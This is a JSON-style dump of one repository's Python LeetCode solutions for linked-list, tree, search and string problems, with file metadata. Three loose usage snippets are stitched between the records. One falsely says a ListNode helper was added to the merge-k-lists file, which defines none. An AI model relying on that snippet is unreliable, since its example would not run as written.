"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return an integer\n def maxPathSum(self, root):\n ''' Given a binary tree, find the maximum path sum.\n\nThe path may start and end at any node in the tree.\n\nFor example:\nGiven the below binary tree,\n\n 1\n / \\\n 2 3\n\nReturn 6. '''\n sumwithroot, maxSum = self.maxTreeSum(root)\n return maxSum\n \n def maxTreeSum(self, node):\n if node is None:\n return [0, 0]\n sum = node.val\n tmax = node.val\n l, lmax = self.maxTreeSum(node.left)\n r, rmax = self.maxTreeSum(node.right)\n if node.left is not None:\n sum = max(sum, l + node.val)\n tmax = max(tmax, sum, l, lmax)\n if node.right is not None:\n sum = max(sum, r + node.val)\n tmax = max(tmax, sum, r, rmax)\n if node.left and node.right:\n tmax = max(tmax, l + r + node.val)\n return [sum, tmax]\n"
},
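A small local check for the Binary Tree Maximum Path Sum record above; the TreeNode stand-in below is an assumption mirroring the commented-out judge definition, since the archived file never defines one:

    class TreeNode:  # stand-in for the OJ-supplied node type
        def __init__(self, x):
            self.val = x
            self.left = None
            self.right = None

    root = TreeNode(1)
    root.left, root.right = TreeNode(2), TreeNode(3)
    print(Solution().maxPathSum(root))  # 6: the path 2 -> 1 -> 3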
{
"alpha_fraction": 0.4435114562511444,
"alphanum_fraction": 0.44503816962242126,
"avg_line_length": 28.11111068725586,
"blob_id": "f75598b80dcdd5d8642a39d46717d60a4d64dff8",
"content_id": "3d6e99fb693a979ea821f1009602e2be17eeea18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1310,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 45,
"path": "/Merge k Sorted Lists.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n#the online judge has already import headq, so del the next line to submit\nimport heapq\n\nclass Solution:\n # @param a list of ListNode\n # @return a ListNode\n def mergeKLists(self, lists):\n '''\n Merge k sorted linked lists and return it as one sorted list. Analyze and describe its complexity. \n '''\n dic = {}\n \n heap = []\n heapq.heapify(heap)\n for l in lists:\n if l:\n if l.val not in dic:\n dic[l.val] = []\n heapq.heappush(heap, l.val)\n dic[l.val].append(l)\n dummyHead = ListNode(0)\n tdh = dummyHead\n while True:\n if len(heap) == 0:\n break\n x = heapq.heappop(heap)\n for l in dic[x]:\n t = l\n l = l.next\n if l:\n if l.val not in dic:\n dic[l.val] = []\n heapq.heappush(heap, l.val)\n dic[l.val].append(l)\n t.next = None\n tdh.next = t\n tdh = t\n del dic[x]\n return dummyHead.next\n"
},
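A hedged usage sketch for the Merge k Sorted Lists record above, relying on the local ListNode helper now defined at the end of that file; it merges 1->4 and 3->5:

    a, b = ListNode(1), ListNode(3)
    a.next, b.next = ListNode(4), ListNode(5)
    merged = Solution().mergeKLists([a, b])
    vals = []
    while merged:  # walk the merged chain
        vals.append(merged.val)
        merged = merged.next
    print(vals)  # [1, 3, 4, 5]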
{
"alpha_fraction": 0.6284454464912415,
"alphanum_fraction": 0.6593164205551147,
"avg_line_length": 28.29032325744629,
"blob_id": "db94a355729f0029eb92ddcd0e36c532f4361f73",
"content_id": "013a4b133b74e6a6947de8b162e457e9e6b2fd5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 907,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 31,
"path": "/Gray Code.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of integers\n def grayCode(self, n):\n '''\n The gray code is a binary numeral system where two successive values differ in only one bit.\n\nGiven a non-negative integer n representing the total number of bits in the code, print the sequence of gray code. A gray code sequence must begin with 0.\n\nFor example, given n = 2, return [0,1,3,2]. Its gray code sequence is:\n\n00 - 0\n01 - 1\n11 - 3\n10 - 2\n\nNote:\nFor a given n, a gray code sequence is not uniquely defined.\n\nFor example, [0,2,3,1] is also a valid gray code sequence according to the above definition.\n\nFor now, the judge is able to judge based on one instance of gray code sequence. Sorry about that.\n '''\n res = [0]\n for i in range(0, n):\n res += reversed([r | (1 << i) for r in res])\n return res\n\nn1 = 1\nn = n1\nprint(n)\nprint(Solution.grayCode(Solution(), n))"
},
{
"alpha_fraction": 0.4784291982650757,
"alphanum_fraction": 0.49059733748435974,
"avg_line_length": 22.802631378173828,
"blob_id": "32d54a190b2e718eb527c96d8438d9720105a813",
"content_id": "a88ec3383725f2f1e3be222355eba89774337f02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1808,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 76,
"path": "/Linked List Cycle II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a list node\n def detectCycle(self, head):\n \"\"\" Given a linked list, return the node where the cycle begins. If there is no cycle, return null.\n\nFollow up:\nCan you solve it without using extra space? \"\"\"\n if head is None:\n return head\n slow = head\n fast = head.next\n while slow and fast and slow != fast:\n if slow:\n slow = slow.next\n if fast:\n fast = fast.next\n if fast:\n fast = fast.next\n if slow is None or fast is None:\n return None\n tmp = slow.next\n cyclesize = 1\n while tmp != slow:\n tmp = tmp.next\n cyclesize += 1\n #print(x, m, cyclesize, slow.val)\n x = cyclesize\n p2 = head\n p1 = head\n while x > 0:\n p2 = p2.next\n x -= 1\n while p2 != p1:\n p2 = p2.next\n p1 = p1.next\n return p2\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n # print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\n\nin0 = [3, 2, 0, -4]\n\nins = [in0]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(head)\n tail.next = head.next.next\n print(ss.detectCycle(head.next).val)\n print()"
},
{
"alpha_fraction": 0.49041712284088135,
"alphanum_fraction": 0.4998120963573456,
"avg_line_length": 28.25274658203125,
"blob_id": "a97f2cd0bbbc7ccf70cb283284bda6d7eac27d96",
"content_id": "5e4b4c3c48f2f8bc0c5a47a859ceb0cb68cc3a26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2661,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 91,
"path": "/Partition List.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @param x, an integer\n # @return a ListNode\n def partition(self, head, x):\n '''\n Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.\n\nYou should preserve the original relative order of the nodes in each of the two partitions.\n\nFor example,\nGiven 1->4->3->2->5->2 and x = 3,\nreturn 1->2->2->4->3->5. \n '''\n def two_list(head, x):\n smallHead = ListNode(0)\n smallTail = smallHead\n largeHead = ListNode(0)\n largeTail = largeHead\n while head:\n if head.val < x:\n smallTail.next = head\n smallTail = smallTail.next\n head = head.next\n smallTail.next = None\n else:\n largeTail.next = head\n largeTail = largeTail.next\n head = head.next\n largeTail.next = None\n smallTail.next = largeHead.next\n return smallHead.next\n def two_pointer(head, x):\n dummyHead = ListNode(0)\n dummyHead.next = head\n small = dummyHead\n while small.next and small.next.val < x:\n small = small.next\n nextsmall = small\n while nextsmall.next:\n while nextsmall.next and nextsmall.next.val >= x:\n nextsmall = nextsmall.next\n if not nextsmall.next:\n break\n t = nextsmall.next\n nextsmall.next = nextsmall.next.next\n t.next = small.next\n small.next = t\n small = t\n return dummyHead.next\n return two_pointer(head, x)\n #return two_list(head, x)\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n # print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\n\nin0 = [1, 4, 3, 5, 2]\n\nins = [in0]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n # print(head)\n print(ss.partition(head.next, 3))\n print()"
},
{
"alpha_fraction": 0.5115070343017578,
"alphanum_fraction": 0.5356347560882568,
"avg_line_length": 31.865854263305664,
"blob_id": "4a6136f4393584793a9cb3bd58a0bfec199b4839",
"content_id": "32b01fc719fb032fef7829fca10611335ea7b83f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2704,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 82,
"path": "/Combination Sum II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param candidates, a list of integers\n # @param target, integer\n # @return a list of lists of integers\n def combinationSum2(self, candidates, target):\n '''\n Given a collection of candidate numbers (C) and a target number (T), find all unique combinations in C where the candidate numbers sums to T.\n\nEach number in C may only be used once in the combination.\n\nNote:\n\n All numbers (including target) will be positive integers.\n Elements in a combination (a1, a2, … , ak) must be in non-descending order. (ie, a1 ≤ a2 ≤ … ≤ ak).\n The solution set must not contain duplicate combinations.\n\nFor example, given candidate set 10,1,2,7,6,1,5 and target 8,\nA solution set is:\n[1, 7]\n[1, 2, 5]\n[2, 6]\n[1, 1, 6]\n '''\n res = self.use_dp(candidates, target)\n return res\n\n #candidates.sort()\n #res = []\n #self.dfs(candidates, 0, target, [], res)\n #return res\n\n #TLE\n def dfs(self, candidates, i, v, nowlist, res):\n if v == 0:\n res.append(list(nowlist))\n return\n if v < 0:\n return\n for start in range(i, len(candidates)):\n nowlist.append(candidates[start])\n self.dfs(candidates, start + 1, v - candidates[start], nowlist, res)\n nowlist.pop()\n while i < len(candidates) and candidates[i] == candidates[i - 1]:\n i += 1\n\n def use_dp(self, candidates, target):\n p = [set() for i in range(target + 1)]\n f = [False] * (target + 1)\n f[0] = True\n candidates.sort(reverse=True)\n dic_count = {}\n for i in range(len(candidates)):\n if candidates[i] not in dic_count:\n dic_count[candidates[i]] = 0\n dic_count[candidates[i]] += 1\n for j in range(target, candidates[i] - 1, -1):\n if f[j - candidates[i]]:\n f[j] = True\n p[j].add(j - candidates[i])\n res = []\n self.path_dfs(dic_count, p, target, [], res)\n return res\n\n def path_dfs(self, dic_count, path, v, nowlist, res):\n if v == 0:\n res.append(list(nowlist))\n return\n for par in path[v]:\n if dic_count[v - par] == 0 or (len(nowlist) > 0 and v - par < nowlist[len(nowlist) - 1]):\n continue\n nowlist.append(v - par)\n dic_count[v - par] -= 1\n self.path_dfs(dic_count, path, par, nowlist, res)\n dic_count[v - par] += 1\n nowlist.pop()\n\n\na0 = [10, [2, 3, 6, 7]]\na1 = [12, [10, 1, 2, 7, 6, 1, 5]]\na = a1\nprint(a)\nprint(Solution.combinationSum2(Solution(), a[1], a[0]))"
},
{
"alpha_fraction": 0.4621676802635193,
"alphanum_fraction": 0.4877300560474396,
"avg_line_length": 21.25,
"blob_id": "cadf417a0b7dbb930ca83d304bd24cd1343278ab",
"content_id": "a21f343a293b850a12e2483d578c24163bf2f1df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 978,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 44,
"path": "/Subsets II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return a list of lists of integer\n def subsetsWithDup(self, S):\n '''\n Given a collection of integers that might contain duplicates, S, return all possible subsets.\n\nNote:\n\n Elements in a subset must be in non-descending order.\n The solution set must not contain duplicate subsets.\n\nFor example,\nIf S = [1,2,2], a solution is:\n\n[\n [2],\n [1],\n [1,2,2],\n [2,2],\n [1,2],\n []\n]\n '''\n S.sort()\n def dfs(a, now, res):\n res.append(list(now))\n if len(a) == 0:\n return\n for i in range(len(a)):\n if i > 0 and a[i] == a[i - 1]:\n continue\n now.append(a[i])\n dfs(a[i + 1:], now, res)\n now.pop()\n res = []\n dfs(S, [], res)\n return res\n\na1 = [1, 2, 2]\na2 = [1, 2, 3]\na = a1\nprint(len(a), a)\nprint(Solution.subsetsWithDup(Solution(), a))"
},
{
"alpha_fraction": 0.5150150060653687,
"alphanum_fraction": 0.5412912964820862,
"avg_line_length": 35.02702713012695,
"blob_id": "623b45cdc3f981452e3d68e18727070fa88be9c3",
"content_id": "f42b598e44f0c62f9b500b1c308a19f0228f1014",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1332,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 37,
"path": "/Maximum Product Subarray.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @return an integer\n def maxProduct(self, A):\n ''' Find the contiguous subarray within an array (containing at least one number) which has the largest product.\n\nFor example, given the array [2,3,-2,4],\nthe contiguous subarray [2,3] has the largest product = 6. '''\n min_positive = 0\n max_negetive = 0\n max_product = A[0]\n now_product = 1\n for a in A:\n if a == 0:\n now_product = 1\n max_negetive = 0\n min_positive = 0\n max_product = max(max_product, 0)\n continue\n now_product *= a\n max_product = max(now_product, max_product)\n if min_positive > 0:\n max_product = max(max_product, now_product // min_positive)\n if max_negetive < 0:\n max_product = max(max_product, now_product // max_negetive)\n if now_product > 0 and (min_positive == 0 or now_product < min_positive):\n min_positive = now_product\n if now_product < 0 and (max_negetive == 0 or now_product > max_negetive):\n max_negetive = now_product\n return max_product\n\na1 = [2, 0, 3, -1, 4]\na2 = [2,-5,-2,-4,3]\na = a2\nprint(a)\ns = Solution()\nprint(s.maxProduct(a))"
},
{
"alpha_fraction": 0.5843740105628967,
"alphanum_fraction": 0.5920588970184326,
"avg_line_length": 40.6533317565918,
"blob_id": "d4ef81e0bfffd4f0fd0030a5572559a8d1ed5e26",
"content_id": "58d8386d2b0664cb631f540c4479a36f01f742a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3123,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 75,
"path": "/Text Justification.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param words, a list of strings\n # @param L, an integer\n # @return a list of strings\n def fullJustify(self, words, L):\n '''\n Given an array of words and a length L, format the text such that each line has exactly L characters and is fully (left and right) justified.\n\nYou should pack your words in a greedy approach; that is, pack as many words as you can in each line. Pad extra spaces ' ' when necessary so that each line has exactly L characters.\n\nExtra spaces between words should be distributed as evenly as possible. If the number of spaces on a line do not divide evenly between words, the empty slots on the left will be assigned more spaces than the slots on the right.\n\nFor the last line of text, it should be left justified and no extra space is inserted between words.\n\nFor example,\nwords: [\"This\", \"is\", \"an\", \"example\", \"of\", \"text\", \"justification.\"]\nL: 16.\n\nReturn the formatted lines as:\n\n[\n \"This is an\",\n \"example of text\",\n \"justification. \"\n]\n\nNote: Each word is guaranteed not to exceed L in length.\n\nclick to show corner cases.\nCorner Cases:\n\n A line other than the last line might contain only one word. What should you do in this case?\n In this case, that line should be left-justified.\n '''\n def processLine(thisLineWords, thisLineWordLen, ans, lastLine = False):\n if lastLine:\n postSpaces = \"\".join([' '] * (L - thisLineWordLen - len(thisLineWords) + 1))\n ans.append(\" \".join(thisLineWords) + postSpaces)\n return\n if len(thisLineWords) == 1:\n postSpaces = \"\".join([' '] * (L - thisLineWordLen))\n ans.append(thisLineWords[0] + postSpaces)\n elif len(thisLineWords) > 1:\n baseSpacesLen = (L - thisLineWordLen) // (len(thisLineWords) - 1)\n remainSpaces = (L - thisLineWordLen) % (len(thisLineWords) - 1)\n baseSpaces = \"\".join([\" \"] * baseSpacesLen)\n thisLine = thisLineWords[0]\n for i in range(1, len(thisLineWords)):\n if remainSpaces > 0:\n remainSpaces -= 1\n thisLine += baseSpaces + \" \" + thisLineWords[i]\n else:\n thisLine += baseSpaces + thisLineWords[i]\n ans.append(thisLine)\n ans = []\n thisLineWords = []\n thisLineWordLen = 0\n for word in words:\n if len(word) + thisLineWordLen + len(thisLineWords) <= L:\n thisLineWordLen += len(word)\n thisLineWords.append(word)\n else:\n processLine(thisLineWords, thisLineWordLen, ans)\n thisLineWordLen = len(word)\n thisLineWords = [word]\n processLine(thisLineWords, thisLineWordLen, ans, True)\n return ans\n\ns1 = [16, [\"This\", \"is\", \"an\", \"example\", \"of\", \"text\", \"justification.\"]]\ns2 = [12, [\"What\",\"must\",\"be\",\"shall\",\"be.\"]]\ns = s2\nprint(s[0], s[1])\nans = Solution.fullJustify(Solution(), s[1], s[0])\nfor line in ans:\n print(line)"
},
{
"alpha_fraction": 0.4040728807449341,
"alphanum_fraction": 0.4394426643848419,
"avg_line_length": 25.685714721679688,
"blob_id": "1865f3fd89e65924d2dd7c3ed56faea31f97f55d",
"content_id": "6effa5472ec79cec21a8e1791ccdcc62fe51e1b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 35,
"path": "/Add Binary.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param a, a string\n # @param b, a string\n # @return a string\n def addBinary(self, a, b):\n '''\n Given two binary strings, return their sum (also a binary string).\n\nFor example,\na = \"11\"\nb = \"1\"\nReturn \"100\". \n '''\n ia = list(reversed([ord(c) - ord('0') for c in a]))\n ib = list(reversed([ord(c) - ord('0') for c in b]))\n ic = [0] * (max(len(ia), len(ib)) + 1)\n x = 0\n for i in range(len(ic)):\n ic[i] = x\n if i < len(ia):\n ic[i] += ia[i]\n if i < len(ib):\n ic[i] += ib[i]\n x = ic[i] // 2\n ic[i] %= 2\n while len(ic) > 1 and ic[len(ic) - 1] == 0:\n ic.pop()\n return ''.join(list(reversed([chr(x + ord('0')) for x in ic])))\n\na1 = ['101011', '1']\na2 = ['1', '1']\na = a2\nprint(a[0])\nprint(a[1])\nprint(Solution.addBinary(Solution(), a[0], a[1]))"
},
{
"alpha_fraction": 0.5058746933937073,
"alphanum_fraction": 0.5300261378288269,
"avg_line_length": 22.953125,
"blob_id": "e9213921795d282b5621baa9189d1b7b950578f2",
"content_id": "a2bf9dba888cfd194ed5c259aa7e276bca0f9c0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1532,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 64,
"path": "/Binary Tree Level Order Traversal II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a list of lists of integers\n def levelOrderBottom(self, root):\n '''Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).\n\nFor example:\nGiven binary tree {3,9,20,#,#,15,7},\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nreturn its bottom-up level order traversal as:\n\n[\n [15,7],\n [9,20],\n [3]\n]\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n if root is None:\n return []\n queue = [[root, 0]]\n res = []\n curdepth = 0\n curlist = []\n while len(queue) > 0:\n node, depth = queue.pop(0)\n if depth > curdepth:\n curdepth = depth\n res.append(list(curlist))\n curlist = []\n curlist.append(node.val)\n if node.left:\n queue.append([node.left, depth + 1])\n if node.right:\n queue.append([node.right, depth + 1])\n res.append(list(curlist))\n res.reverse()\n return res\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\ns = Solution()\nt0 = TreeNode(1)\nt1 = TreeNode(2)\nt0.left = t1\nprint(s.levelOrderBottom(t0))"
},
{
"alpha_fraction": 0.603960394859314,
"alphanum_fraction": 0.6089109182357788,
"avg_line_length": 32.70000076293945,
"blob_id": "744b8c930cb7f7ba62677784c8f1df54e0d66786",
"content_id": "731afdd98c04d015a7739c95bc8d78540c023bc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1010,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 30,
"path": "/Construct Binary Tree from Inorder and Postorder Traversal.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n # @param inorder, a list of integers\n # @param postorder, a list of integers\n # @return a tree node\n def buildTree(self, inorder, postorder):\n '''Given inorder and postorder traversal of a tree, construct the binary tree.\n\nNote:\nYou may assume that duplicates do not exist in the tree. '''\n if len(inorder) == 0:\n return None\n rootval = postorder.pop()\n leftNum = inorder.index(rootval)\n rightNum = len(inorder) - 1 - leftNum\n node = TreeNode(rootval)\n node.left = self.buildTree(inorder[0:leftNum], postorder[0:leftNum])\n node.right = self.buildTree(inorder[leftNum + 1:], postorder[leftNum:leftNum + rightNum])\n return node\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None"
},
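A minimal local run for the Construct Binary Tree record above (using the TreeNode class the file itself defines); inorder [9,3,15,20,7] with postorder [9,15,7,20,3] yields root 3 with children 9 and 20:

    root = Solution().buildTree([9, 3, 15, 20, 7], [9, 15, 7, 20, 3])
    print(root.val, root.left.val, root.right.val)  # 3 9 20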
{
"alpha_fraction": 0.4242534637451172,
"alphanum_fraction": 0.442461758852005,
"avg_line_length": 32.5,
"blob_id": "8eb4a5e33ede7cf0e6b78f205a88ada0eae4a063",
"content_id": "faa37e5bdbbdc65a0d27620b5bb5e99a16cc5006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2746,
"license_type": "no_license",
"max_line_length": 483,
"num_lines": 82,
"path": "/Word Search.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n dirs = [[0, -1], [0, 1], [-1, 0], [1, 0]]\n # @param board, a list of lists of 1 length string\n # @param word, a string\n # @return a boolean\n def exist(self, board, word):\n '''\n Given a 2D board and a word, find if the word exists in the grid.\n\nThe word can be constructed from letters of sequentially adjacent cell, where \"adjacent\" cells are those horizontally or vertically neighboring. The same letter cell may not be used more than once.\n\nFor example,\nGiven board =\n\n[\n [\"ABCE\"],\n [\"SFCS\"],\n [\"ADEE\"]\n]\n\nword = \"ABCCED\", -> returns true,\nword = \"SEE\", -> returns true,\nword = \"ABCB\", -> returns false.\n '''\n def checkValid(flag, x, y, m, n):\n return 0 <= x < m and 0 <= y < n and flag[x][y]\n def dfs(word, board, flag, x, y, m, n):\n if word == '':\n return True\n if word[0] != board[x][y]:\n return False\n if len(word) == 1:\n return True\n flag[x][y] = False\n for i in range(len(self.dirs)):\n newp = [x + self.dirs[i][0], y + self.dirs[i][1]]\n if checkValid(flag, newp[0], newp[1], m, n):\n if dfs(word[1:], board, flag, newp[0], newp[1], m, n):\n return True\n flag[x][y] = True\n return False\n\n m = len(board)\n if m == 0:\n return word == ''\n n = len(board[0])\n flag = [[True] * n for row in range(m)]\n for i in range(m):\n for j in range(n):\n if dfs(word, board, flag, i, j, m, n):\n return True\n return False\n\na1 = ['ABCCED', [\n [\"A\", \"B\", \"C\", \"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]\n]]\na2 = ['SEE', [\n [\"A\", \"B\", \"C\", \"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]\n]]\na3 = ['ABCB', [\n [\"A\", \"B\", \"C\", \"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]\n]]\na4s = [[\"gbgptkbnfcxdxdohfcwhyopseabpqsawuinpvqectbfsgtznyxuwolrslukemkagvqxsgcuzfarovsbtqysgjlyvf\",\"izrvbaqrziybczjetxclaxdyrjickfhsebnhdfbcpbeuapatochocmntwvygahagiqplxqonrujuljpzoynqlclhz\",\"lpbtrhbhzpfpfujbdfmowncvaugfipetegmxpqfqhmgmgrplybbuoepqavvikceqksozivqrhyfprucpvdlljbeky\",\"zujdybnrppbkftrfyiyvkpsoaexbkjalelpemcxerboyuifusdrdskttqswacylilamyfmeynsxjcefxixaahtvxn\",\"uxpskxelmesyiqncnwhsbecygefbaeowdeoodubpytpijcnzyutcavagbihdovzszoifklujgmtpogqpajragtiib\",\"plsllkmburlhownaqcqwvhzgabnukxxzipmvbzyvskeiirkywbxrkyxlzmhljeluuzrvaqttcxbkrmjnpiebgdmfq\",\"trzyetufnrgdmbfmepdsaqhiujozxwptnprtknyxegcthhfmziezyoiuzwtwslphcicovdocjqxracfzkjykxigwf\",\"bvzmkjovnfsqtucjrvjvaihjjtjrzfydcapnjgkwlcpezrpsmboojvxupimqqktsklhvtrugulmteblsebgozdkom\",\"wgcjcwvnetivnopackefywkzcayhkovjxzszwpociwxxmpxobdtzzdbddblqsizpkrogieitahqmwqcytvzvbayge\",\"lwwuvleobmzfwsffkteaxewudrvgpekdcgxatdqurpzpjguubyuycsuijsobwyeygbazgrtxiuoscimfhiflbztkr\",\"jlpjrqpsqoajjzsfnkjywqhexsfxosqxfihxyyronsyytsghcrhyiocfgkewcvwjddgdbytqstrllxunqblypqeyc\",\"kwgfspkvwnzuhrmckzojubaxpypfephplpweejbawcwfukkgkyqgzqdoqsvvhemvtizytaasfxzbjjhthxbhnfxgz\",\"vdjzpevzfvthvlmukneuvzdubkkikqhhtsiiydjdycnwpzscpwymwbgzoqhygqhzlpjjtvptzcrpdktsgreeslfgb\",\"mgkfnlqfxzysqtrsliyvbqdsvknipvleevjtjzygawytsrndalabcfwzpljfgulmsugbvejxdhqvaeaapaerfcsxn\",\"bevypiqlqtgucdzluwlawopysjgwddlfjgfyqxjgqpduuehqbuqxiiycreaujlbsugskdbtvsyrocafdvxdffdkwh\",\"ktsyuksdeeifzgzxxncauhvsmcxpowybpqzjcrogvxnvdoucewcygzsscqisogtdzsobjdkhcxcfmwjsvmqbllvpd\",\"dirmdulwkohnyorwswkrgcmuupffkxiqhzckvpigdqvegnczlmqtqepktvsductbexlzowhumfyuuavfonberqqmn\",\"kqhnlktlwuzscvgjtcdtykjllnfegrtqjdfvnyijtjdxflgyojuotdzhtgnbygrhjzezxoksyopdbvbrgxfcdhjwn\",\"yxlgqvsrbrpqbhorzrtuukdsqfxzqtmosawkvocyhtojcccbvvysibmaijzyelmynkiizmjghxrkcunzrnrzqdbym\",\"awqokobvzmwnvevswhwsuwjknla
tozfpvyfgmgbnszbpdyibfgtbcflssolgnqxiqcqdjtsdsvtwtdxajtcoapisd\",\"taslybcathlnbpfxkdqpdrywvowmwqsrqkdonhrjocwptdmfjfumyvkvlihiybzqoehdlambcityohfxmalmxvhid\",\"rqdssviwcmkcylhhghxomuaohplcwuhnmmighqfkepodcvmjejxrfzfmotqnpxcblkisdnehetmgqyrvhomoqtceo\",\"srdruhcgpxlebvkuhqlgkgpyugopivgdojuiqzrhwcnxxxufqfnancyjkpytmewaqsjitcqpefpedjjtqytdctmnk\",\"mgwtezlwktqmlhqrwuwhfpxfkcifqxqffoyjnlhzezlshejfahpgwonirxnhufozwmilzslgryyacjidqxlolywew\",\"loqtcsrrcequpwoouoqdwvvvgjhfhndtbvoenhvqllmdiarerjiphdlnpuuwhxrltfpimkaavndfpukgfuymzlcof\",\"wlouczpiqxwaywylzdcvpldjjrjutxbqirmltbvjytkwqkjrpmpfzsqilzefzhxjylwrmtdmnnjfzuyointhhmrtl\",\"vamczwdkuuyoxkbmvgnqecauxibjzwxxyjbzhejcbjqaurnpzchfeizcsdntbkqcusbdynfzwvaqopiprpvwzwarb\",\"nnfadhuxizwxfxwcxotowigofeneehftumtztpzepxbwuxyuorikcoahsolyxtutfpsbftfwqislishwmpioejxyz\",\"lzygvrnklopfvnxgfkoarmmhwcnfbngmoeujviujwlouzlagwqgncuwawjgyzmmnrhxoptxnenhfzhoxxumbplcnu\",\"klvyyjpfggwbdjhtrnuabryxfboqdcnpniontfublqcrckktzetcxtzevovaqksfugvolppziusmeeffiahhwilty\",\"ivqunwpttfhiwisqaewelbooixmtifrtainogejzjsjgaeycivgwwwmhtyaeftxfbkvjphiazuiayhcicleajqhdq\",\"jhvdedgqaqhhyijsqlszpbbafemylpqxymaergurwcbxmkrexkemlhpslbszsjwqxyuogqhfukcguvltfpgsyxnky\",\"hlqqhiphefnupspzwvwsipzxvuwshisotkhcsylweytvtiurfqjoglndhlyotqeodnsvoduuenpxxjocaasgngjur\",\"jknaqddewasbwofjdcimtlmtfuglgcfpmurcxwivxcxtqefthnicawvgrdtzfyotsivseendimxzreuarccuzzcse\",\"vrjwheopziwfyzokypdcjdwohsniuhmpyxlhbczdkvkiwyvvpyzbevpnnewjlkzlimsjorobozllzgiphhqnfhcul\",\"aewlfhtrbegvvhjuswtbekkocxtjbpwctsnybiqdmyahhjdbixcojmcmlvxnlupgmefqmxvavvkegnfomidwwfikd\",\"hzqbqwoudggcbizwsdcijtutwsrdcb